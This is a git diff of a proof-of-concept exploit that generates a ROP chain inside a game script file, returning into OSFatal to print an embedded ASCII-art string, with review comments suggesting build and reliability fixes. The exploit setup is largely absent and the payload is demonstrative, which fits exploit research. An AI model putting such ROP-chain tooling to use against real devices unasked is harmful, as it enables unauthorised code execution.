diff --git a/kexploit/generate_rop.py b/kexploit/generate_rop.py index b52fc27..6b15185 100644 --- a/kexploit/generate_rop.py +++ b/kexploit/generate_rop.py @@ -16,7 +16,7 @@ def writeEnd(): script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend" """ -Example payload +Example payload (writeOSFatalPayload func) pushInt. 0xC00C650 pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) @@ -50,6 +50,7 @@ pushInt. 0x01031618 #return address (OSFatal) """ +# Print out contents of payload as null terminated string def writeOSFatalPayload(): write32(LOAD_R3_ADDR) writePayloadAddress() @@ -63,7 +64,9 @@ def main(): global script with open('rop_setup.s', 'r') as f: script = f.read() + writeOSFatalPayload() + with open("main.s", 'w') as f: f.write(script) diff --git a/poc/Makefile b/poc/Makefile new file mode 100644 index 0000000..e435e49 --- /dev/null +++ b/poc/Makefile @@ -0,0 +1,14 @@ +all: exploit.mscsb + +clean: + rm -f exploit.mscsb payload.s main.s + +exploit.mscsb: payload.s Scripts main.s + python3 ../pymsc/asm.py + +payload.s: payload.bin + python3 generate_payload.py + +main.s: rop_setup.s + python3 generate_rop.py + diff --git a/poc/Scripts b/poc/Scripts index 8e613f9..7500d16 100644 --- a/poc/Scripts +++ b/poc/Scripts @@ -1,3 +1,3 @@ -:script_0.txt -string.txt -|mario.mscsb +:main.s +payload.s +|exploit.mscsb diff --git a/poc/generate_string.py b/poc/generate_payload.py similarity index 50% rename from poc/generate_string.py rename to poc/generate_payload.py index c7fed5f..329b782 100644 --- a/poc/generate_string.py +++ b/poc/generate_payload.py @@ -1,4 +1,4 @@ -with open('string.bin', 'rb') as stringFile: - with open('string.txt', 'w') as f: +with open('payload.bin', 'rb') as stringFile: + with open('payload.s', 'w') as f: for byte in stringFile.read(): print('byte %s' % hex(byte), file=f) 
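Review bot: In the main() hunk, writeOSFatalPayload() appends its `pushInt. …` lines straight onto whatever `f.read()` returned, so if rop_setup.s lacks a trailing newline the first gadget (LOAD_R3_ADDR) is glued onto the file's last line — and since the new rop_setup.s now ends in the comment `#Write ROP Chain`, that first pushInt would presumably become comment text and the chain would silently start one word short. This is not hypothetical: the old script_0.txt carried exactly that "No newline at end of file" condition. Normalise the buffer right after the read, `if not script.endswith("\n"): script += "\n"`. The write32/writeEnd helpers that main() relies on are outside this hunk.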
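Review bot: The `main.s: rop_setup.s` and `payload.s: payload.bin` rules omit the generator scripts from their prerequisites, so editing generate_rop.py or generate_payload.py will not trigger a rebuild and a stale exploit.mscsb gets assembled from old intermediates. Add them, `main.s: rop_setup.s generate_rop.py` and `payload.s: payload.bin generate_payload.py`, and declare `.PHONY: all clean` so a stray file named `clean` cannot mask the target. `python3 ../pymsc/asm.py` is invoked with no arguments, so it presumably locates `Scripts` via the current directory; a one-line comment above the rule saying the recipe must run from poc/ would save the next person a confusing failure.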
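Review bot: generate_payload.py emits payload.bin byte-for-byte, so the NUL terminator that the chain's OSFatal call (per the "null terminated string" comment added to generate_rop.py) needs to stop printing is only present if it was baked into the binary — the deleted string.txt did end in `byte 0x0`, but nothing enforces that for a replacement payload, and an unterminated buffer would presumably let OSFatal read past the payload into whatever follows mscScriptAddress. Read the blob once, `data = stringFile.read()`, and after the loop guard it with `if not data or data[-1] != 0: print('byte 0x0', file=f)`. The two nested `with` blocks can also collapse into one `with open(...) as stringFile, open(...) as f:`.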
diff --git a/poc/generate_rop.py b/poc/generate_rop.py new file mode 100644 index 0000000..6b15185 --- /dev/null +++ b/poc/generate_rop.py @@ -0,0 +1,74 @@ + +# Addresses +LOAD_R3_ADDR = 0x0C00C650 +OSFATAL_ADDR = 0x01031618 + +def write32(u32): + global script + script += f"pushInt. {hex(u32)}\n" + +def writePayloadAddress(): + global script + script += "pushVar. globalVar,mscScriptAddress\n" + +def writeEnd(): + global script + script += "#Execute ROP chain\nexit\n\n#Dunno why but I figured I might as well put it here, should never hit this though\nend" + +""" +Example payload (writeOSFatalPayload func) + +pushInt. 0xC00C650 +pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) +pushInt. 0xBEEF0001 +pushInt. 0xBEEF0002 +pushInt. 0xBEEF0003 +pushInt. 0xBEEF0004 +pushInt. 0xBEEF0005 +pushInt. 0xBEEF0006 +pushInt. 0xBEEF0007 +pushInt. 0xBEEF0008 +pushInt. 0xBEEF0009 +pushInt. 0xBEEF000A +pushInt. 0xBEEF000B +pushInt. 0xBEEF000C +pushInt. 0xBEEF000D +pushInt. 0xBEEF000E +pushInt. 0xBEEF000F +pushInt. 0xBEEF0010 +pushInt. 0xBEEF0011 +pushInt. 0xBEEF0012 +pushInt. 0xBEEF0013 +pushInt. 0xBEEF0014 +pushInt. 0xBEEF0015 +pushInt. 0xBEEF0016 +pushInt. 0xBEEF0017 +pushInt. 0xBEEF0018 +pushInt. 0xBEEF0019 +pushInt. 0xBEEF001A +pushInt. 0x01031618 #return address (OSFatal) + +""" + +# Print out contents of payload as null terminated string +def writeOSFatalPayload(): + write32(LOAD_R3_ADDR) + writePayloadAddress() + for i in range(0x1A): + write32(0xBEEF0000 + i + 1) + write32(OSFATAL_ADDR) + writeEnd() + + +def main(): + global script + with open('rop_setup.s', 'r') as f: + script = f.read() + + writeOSFatalPayload() + + with open("main.s", 'w') as f: + f.write(script) + +if __name__ == "__main__": + main() diff --git a/poc/mario.mscsb b/poc/mario.mscsb deleted file mode 100644 index 2ed4688..0000000 Binary files a/poc/mario.mscsb and /dev/null differ 
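Review bot: poc/generate_rop.py is a byte-identical copy of kexploit/generate_rop.py — both hunks point at blob 6b15185 — so the two will drift the first time one is touched; have the poc copy import or invoke the kexploit one, or move the generator into a shared module and keep only the input/output paths per directory. Independently, `script` is only ever bound inside main(), so calling write32()/writePayloadAddress()/writeEnd() from anywhere else raises NameError on `script +=`; initialising `script = ""` at module level next to the address constants (or passing the buffer explicitly) makes the helpers reusable. The `for i in range(0x1A): write32(0xBEEF0000 + i + 1)` loop also deserves a comment, e.g. `# 0x1A filler words (0xBEEF0001..0xBEEF001A) between the r3 slot and the OSFatal return address`, since the stack layout they pad is set up in rop_setup.s, outside this file, and the marker values look like placeholders rather than meaningful data.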
diff --git a/poc/string.bin b/poc/payload.bin similarity index 100% rename from poc/string.bin rename to poc/payload.bin diff --git a/poc/script_0.txt b/poc/rop_setup.s similarity index 88% rename from poc/script_0.txt rename to poc/rop_setup.s index e63e5a7..79a1bb2 100644 --- a/poc/script_0.txt +++ b/poc/rop_setup.s @@ -758,39 +758,4 @@ pushShort. 0x80 #Now we can overwrite the stack position with the one we calculated earlier to jump to the write position pushVar. globalVar,calculatedStackPosition -#Write ROP chain -pushInt. 0xC00C650 -pushVar. globalVar,mscScriptAddress #r3 value (will be printed by OSFatal) -pushInt. 0xBEEF0001 -pushInt. 0xBEEF0002 -pushInt. 0xBEEF0003 -pushInt. 0xBEEF0004 -pushInt. 0xBEEF0005 -pushInt. 0xBEEF0006 -pushInt. 0xBEEF0007 -pushInt. 0xBEEF0008 -pushInt. 0xBEEF0009 -pushInt. 0xBEEF000A -pushInt. 0xBEEF000B -pushInt. 0xBEEF000C -pushInt. 0xBEEF000D -pushInt. 0xBEEF000E -pushInt. 0xBEEF000F -pushInt. 0xBEEF0010 -pushInt. 0xBEEF0011 -pushInt. 0xBEEF0012 -pushInt. 0xBEEF0013 -pushInt. 0xBEEF0014 -pushInt. 0xBEEF0015 -pushInt. 0xBEEF0016 -pushInt. 0xBEEF0017 -pushInt. 0xBEEF0018 -pushInt. 0xBEEF0019 -pushInt. 0xBEEF001A -pushInt. 0x01031618 #return address (OSFatal) - -#Execute ROP chain -exit - -#Dunno why but I figured I might as well put it here, should never hit this though -end \ No newline at end of file +#Write ROP Chain diff --git a/poc/string.txt b/poc/string.txt deleted file mode 100644 index 848a549..0000000 --- a/poc/string.txt +++ /dev/null 
@@ -1,120 +0,0 @@
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x5f
-byte 0x20
-byte 0x20
-byte 0xa
-byte 0x20
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x2f
-byte 0x20
-byte 0x5f
-byte 0x60
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x27
-byte 0x5f
-byte 0x20
-byte 0x5c
-byte 0x20
-byte 0xa
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x28
-byte 0x5f
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x20
-byte 0x7c
-byte 0x5f
-byte 0x29
-byte 0x20
-byte 0x7c
-byte 0xa
-byte 0x20
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5c
-byte 0x5f
-byte 0x5f
-byte 0x2c
-byte 0x5f
-byte 0x7c
-byte 0x5f
-byte 0x2e
-byte 0x5f
-byte 0x5f
-byte 0x2f
-byte 0x20
-byte 0x0